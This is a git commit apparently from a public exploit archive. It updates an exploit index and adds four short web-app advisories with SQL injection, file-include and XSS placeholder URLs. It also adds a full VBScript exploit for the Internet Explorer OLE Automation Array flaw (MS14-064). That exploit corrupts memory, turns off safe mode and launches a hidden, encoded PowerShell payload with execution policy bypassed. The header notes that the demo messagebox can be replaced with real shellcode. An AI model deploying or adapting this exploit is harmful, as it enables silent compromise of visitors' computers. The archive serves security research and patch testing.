Updated 11_22_2014

2014-11-22 04:48:25 +00:00 · 2014-11-22 04:48:25 +00:00 · ba4b116f27
commit ba4b116f27
parent bf592f7589
6 changed files with 277 additions and 1 deletions
--- a/files.csv
+++ b/files.csv
@ -31731,7 +31731,7 @@ id,file,description,date,author,platform,type,port
 35226,platforms/windows/remote/35226.py,"Avira AntiVir Personal Multiple Code Execution Vulnerabilities (2)",2011-01-14,D.Elser,windows,remote,0
 35227,platforms/php/webapps/35227.txt,"Alguest 1.1c-patched 'elimina' Parameter SQL Injection Vulnerability",2011-01-14,"Aliaksandr Hartsuyeu",php,webapps,0
 35228,platforms/php/webapps/35228.txt,"CompactCMS 1.4.1 Multiple Cross Site Scripting Vulnerabilities",2011-01-15,NLSecurity,php,webapps,0
-35229,platforms/windows/remote/35229.html,"Internet Explorer < 11 - OLE Automation Array Remote Code Execution",2014-11-13,yuange,windows,remote,0
+35229,platforms/windows/remote/35229.html,"Internet Explorer <= 11 - OLE Automation Array Remote Code Execution (#1)",2014-11-13,yuange,windows,remote,0
 35230,platforms/windows/remote/35230.rb,"Internet Explorer < 11 - OLE Automation Array Remote Code Execution (MSF)",2014-11-13,"Wesley Neelen & Rik van Duijn",windows,remote,0
 35231,platforms/php/webapps/35231.txt,"Advanced Webhost Billing System 2.9.2 'oid' Parameter SQL Injection Vulnerability",2011-01-16,ShivX,php,webapps,0
 35232,platforms/linux/remote/35232.txt,"Pango Font Parsing 'pangoft2-render.c' Heap Corruption Vulnerability",2011-01-18,"Dan Rosenberg",linux,remote,0
@ -31800,3 +31800,8 @@ id,file,description,date,author,platform,type,port
 35305,platforms/php/webapps/35305.txt,"ACollab 't' Parameter SQL Injection Vulnerability",2011-02-01,"AutoSec Tools",php,webapps,0
 35306,platforms/php/webapps/35306.txt,"TCExam 11.1.16 'user_password' Parameter Cross Site Scripting Vulnerability",2011-02-02,"AutoSec Tools",php,webapps,0
 35307,platforms/php/webapps/35307.py,"All In One Control Panel 1.4.1 'cp_menu_data_file.php' SQL Injection Vulnerability",2011-01-31,"AutoSec Tools",php,webapps,0
+35308,platforms/windows/remote/35308.html,"Internet Explorer OLE Pre-IE11 - Automation Array Remote Code Execution / Powershell VirtualAlloc (MS14-064)",2014-11-20,"GradiusX & b33f",windows,remote,0
+35309,platforms/php/webapps/35309.txt,"Betsy 4.0 'page' Parameter Local File Include Vulnerability",2011-02-02,MizoZ,php,webapps,0
+35310,platforms/asp/webapps/35310.txt,"Web Wiz Forums <= 9.5 Multiple SQL Injection Vulnerabilities",2011-03-23,eXeSoul,asp,webapps,0
+35311,platforms/php/webapps/35311.txt,"Octeth Oempro 3.6.4 SQL Injection and Information Disclosure Vulnerabilities",2011-02-03,"Ignacio Garrido",php,webapps,0
+35312,platforms/php/webapps/35312.txt,"Firebook 'index.html' Cross Site Scripting Vulnerability",2011-02-03,MustLive,php,webapps,0
--- a/platforms/asp/webapps/35310.txt
+++ b/platforms/asp/webapps/35310.txt
@ -0,0 +1,8 @@
+source: http://www.securityfocus.com/bid/46131/info
+
+Web Wiz Forums is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.
+
+A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. 
+
+http://www.example.com/default.asp?pid=[SQLi]
+http://www.example.com/viewproduct.asp?PID=[SQli] 
--- a/platforms/php/webapps/35309.txt
+++ b/platforms/php/webapps/35309.txt
@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/46124/info
+
+Betsy is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit this vulnerability to obtain potentially sensitive information and to execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
+
+Betsy 4.0 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/ress.php?page=[LFI] 
--- a/platforms/php/webapps/35311.txt
+++ b/platforms/php/webapps/35311.txt
@ -0,0 +1,17 @@
+source: http://www.securityfocus.com/bid/46135/info
+
+Octeth Oempro is prone to multiple SQL-injection vulnerabilities and an information-disclosure vulnerability.
+
+Exploiting these issues could allow an attacker to obtain sensitive information, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Octeth Oempro 3.6.4 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/cli_bounce.php
+
+http://www.example.com/link.php?URL=[ENC URL]&Name=&EncryptedMemberID=[ENCODED
+SQLI]&CampaignID=9&CampaignStatisticsID=16&Demo=0&Email=[MAIL]
+
+http://www.example.com/html_version.php?ECID=[SQL]
+
+http://www.example.com/archive.php?ArchiveID=[SQL]
+
--- a/platforms/php/webapps/35312.txt
+++ b/platforms/php/webapps/35312.txt
@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/46143/info
+
+Firebook is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input.
+
+Exploiting these issues will allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and steal cookie-based authentication credentials. 
+
+http://www.example.com/env/index.html?[xss] 
--- a/platforms/windows/remote/35308.html
+++ b/platforms/windows/remote/35308.html
@ -0,0 +1,230 @@
+<!doctype html>
+<html>
+<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
+<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
+<body>
+
+<pre>
+|--------------------------------------------------------------------------|
+| Title: OLE Automation Array Remote Code Execution => Pre IE11            |
+| Original Exploit: yuange - http://www.exploit-db.com/exploits/35229/     |
+| Rework: GradiusX (francescomifsud@gmail.com ) & b33f (@FuzzySec)         |
+| Shellcode: Use the Veil-Framework, powershell/shellcode_inject/virtual   |
+| Usage:  http://www.fuzzysecurity.com/exploits/21.html                    |
+|--------------------------------------------------------------------------|
+   Very nice black-magic yuange, don't think it went unnoticed that you  
+     have been popping shells since 2009 :D  ???????????          
+|--------------------------------------------------------------------------|
+</pre>
+
+<SCRIPT LANGUAGE="VBScript">
+function runmumaa() 
+On Error Resume Next
+set shell=createobject("Shell.Application")
+
+'powershell/shellcode_inject/virtual --> windows/messagebox title='Ooops!'  text='Powershell FTW!'
+payload="nVVdi9tGFH33rxiMHmzWWkYafTlmIWlDIVBCYZf2wfhhNBp1RWXJyHLqTZv/Xp1jXzfbvIS+zOed+3HOuVLg1IN6O59t37fth/2hH8bF/A8/dL418X3VtvPlTh1OZds4dRztOE3+PE736kM3/jIO6tdmGE+2fde2vVtcz/5cqVPTjep8nV+u8+fl5n/H+XHwdvRPz9NUSZzT1e+nlfo38nX1VezryX+j74+f3DB+T+y93x/9uPjW862q+dtZ0E9Avquq8Onl4FU4vSn98N7XTdeMTd+pwKnwo917Nf+t6Uw8V2E37Y4H67ziyU+nzsHyqMKDPR7H5+E0C84PQf/mzSuQ9UqfI60xmcuU6OVGbX94Gf12twuOYFSfSzvdlH4a0nIaqnoadIIVLlyF1XoacpzFGGoMKS5MBBPcllglsZylKYJjq82rbYFtjkApAhl4qfkC0YpSVjHs4mIaMgwWMTy8aHhxGOIMDnKY4FmSSwZJJsUweIwzywwAQoZVBWODojOcFTDJnJwlWEUImaDUAsYOrjTfOkGIzwxWDsVERA0mKbOiSSaQlE5KveCSSvYpb1lbJdmXpAu5WJpoiaFRVpRL4uQjIUwstbxFY/kwsYDTYlsjhkdZa+bCisj+WgAzRnJ2GGwsbGVWmPYwyZBLgUA1TNbEvhQCclwUMI5g5wrRCzN1pTAdZVJvokV6eSyuCCLR1dRfLtjTAcVAOC0c+FpqIy4+kVwuNFqhlgjVTgjInZCca8GgYBp4VuFF4UQ5OR0QXSNxHTmHcU2VYIi8SI89UxIrbD1u4/WtNmoSkBhkmhYiM4vBpcJ5iQvKu85EFvRiE8mAqbFXSRnB1kic3UN0CbZln99WFu7ZW449SEKtaCjLhWn2L+kmRwwUkW6qCTGo3UKLQBLYsY+ocSJOV57y5rckFm1UbNhYZMZ+uxBAV6mwcOkPwnnrvALD2kjlbGIWQyFlN6kwe4LNXiCDrJJvK0rUCKamlEDUGnEhySlQ44cxgtOMRaeSqXUiH34izVoqj9zqa53WVJi5VamFClYZ10xoM6v7QS2C5kFvgkaFrZ82R3f/s+9+H5/DaDmd3t0t1V/48F//PNvLr2e3CM73T/20MfFieRc0y5Wanm6DZrdS0VL9rfrTGHantt18mQWf+et49d+cEloF5xUm/DIeRzuM4WPr/UGFj971XaXwZ9H6Hw=="
+
+command="Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(""""" & chr(34) & payload & chr(34) & """"")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();"
+
+params="-NoP -NonI -Exec Bypass -Command " & command
+
+'Original POC yuange
+'set shell=createobject("Shell.Application")
+'shell.ShellExecute "notepad.exe"
+
+'With UAC
+'shell.ShellExecute "powershell", params, "", "runas", 0
+
+'Without UAC
+shell.ShellExecute "powershell", params, "", "", 0
+
+end function
+</script>
+
+<SCRIPT LANGUAGE="VBScript">
+ 
+dim   aa()
+dim   ab()
+dim   a0
+dim   a1
+dim   a2
+dim   a3
+dim   win9x
+dim   intVersion
+dim   rnda
+dim   funclass
+dim   myarray
+
+Begin()
+
+function Begin()
+  On Error Resume Next
+  info=Navigator.UserAgent
+
+  if(instr(info,"Win64")>0)   then
+     exit   function
+  end if
+
+  if (instr(info,"MSIE")>0)   then 
+             intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2))   
+  else
+     exit   function  
+             
+  end if
+
+  win9x=0
+
+  BeginInit()
+  If Create()=True Then
+     myarray=        chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)
+     myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0)
+
+     if(intVersion<4) then
+         document.write("<br> IE")
+         document.write(intVersion)
+         runshellcode()                    
+     else  
+          setnotsafemode()
+     end if
+  end if
+end function
+
+function BeginInit()
+   Randomize()
+   redim aa(5)
+   redim ab(5)
+   a0=13+17*rnd(6)
+   a3=7+3*rnd(5)
+end function
+
+function Create()
+  On Error Resume Next
+  dim i
+  Create=False
+  For i = 0 To 400
+    If Over()=True Then
+    '   document.write(i)     
+       Create=True
+       Exit For
+    End If 
+  Next
+end function
+
+sub testaa()
+end sub
+
+function mydata()
+    On Error Resume Next
+     i=testaa
+     i=null
+     redim  Preserve aa(a2)  
+  
+     ab(0)=0
+     aa(a1)=i
+     ab(0)=6.36598737437801E-314
+
+     aa(a1+2)=myarray
+     ab(2)=1.74088534731324E-310  
+     mydata=aa(a1)
+     redim  Preserve aa(a0)  
+end function 
+
+
+function setnotsafemode()
+    On Error Resume Next
+    i=mydata()  
+    i=readmemo(i+8)
+    i=readmemo(i+16)
+    j=readmemo(i+&h134)  
+    for k=0 to &h60 step 4
+        j=readmemo(i+&h120+k)
+        if(j=14) then
+              j=0          
+              redim  Preserve aa(a2)             
+     aa(a1+2)(i+&h11c+k)=ab(4)
+              redim  Preserve aa(a0)  
+
+     j=0 
+              j=readmemo(i+&h120+k)   
+         
+               Exit for
+           end if
+
+    next 
+    ab(2)=1.69759663316747E-313
+    runmumaa() 
+end function
+
+function Over()
+    On Error Resume Next
+    dim type1,type2,type3
+    Over=False
+    a0=a0+a3
+    a1=a0+2
+    a2=a0+&h8000000
+  
+    redim  Preserve aa(a0) 
+    redim   ab(a0)     
+  
+    redim  Preserve aa(a2)
+  
+    type1=1
+    ab(0)=1.123456789012345678901234567890
+    aa(a0)=10
+          
+    If(IsObject(aa(a1-1)) = False) Then
+       if(intVersion<4) then
+           mem=cint(a0+1)*16             
+           j=vartype(aa(a1-1))
+           if((j=mem+4) or (j*8=mem+8)) then
+              if(vartype(aa(a1-1))<>0)  Then    
+                 If(IsObject(aa(a1)) = False ) Then             
+                   type1=VarType(aa(a1))
+                 end if               
+              end if
+           else
+             redim  Preserve aa(a0)
+             exit  function
+
+           end if 
+        else
+           if(vartype(aa(a1-1))<>0)  Then    
+              If(IsObject(aa(a1)) = False ) Then
+                  type1=VarType(aa(a1))
+              end if               
+            end if
+        end if
+    end if
+              
+    
+    If(type1=&h2f66) Then         
+          Over=True      
+    End If  
+    If(type1=&hB9AD) Then
+          Over=True
+          win9x=1
+    End If  
+
+    redim  Preserve aa(a0)          
+        
+end function
+
+function ReadMemo(add) 
+    On Error Resume Next
+    redim  Preserve aa(a2)  
+  
+    ab(0)=0   
+    aa(a1)=add+4     
+    ab(0)=1.69759663316747E-313       
+    ReadMemo=lenb(aa(a1))  
+   
+    ab(0)=0    
+ 
+    redim  Preserve aa(a0)
+end function
+
+</script>
+
+</body>
+</html>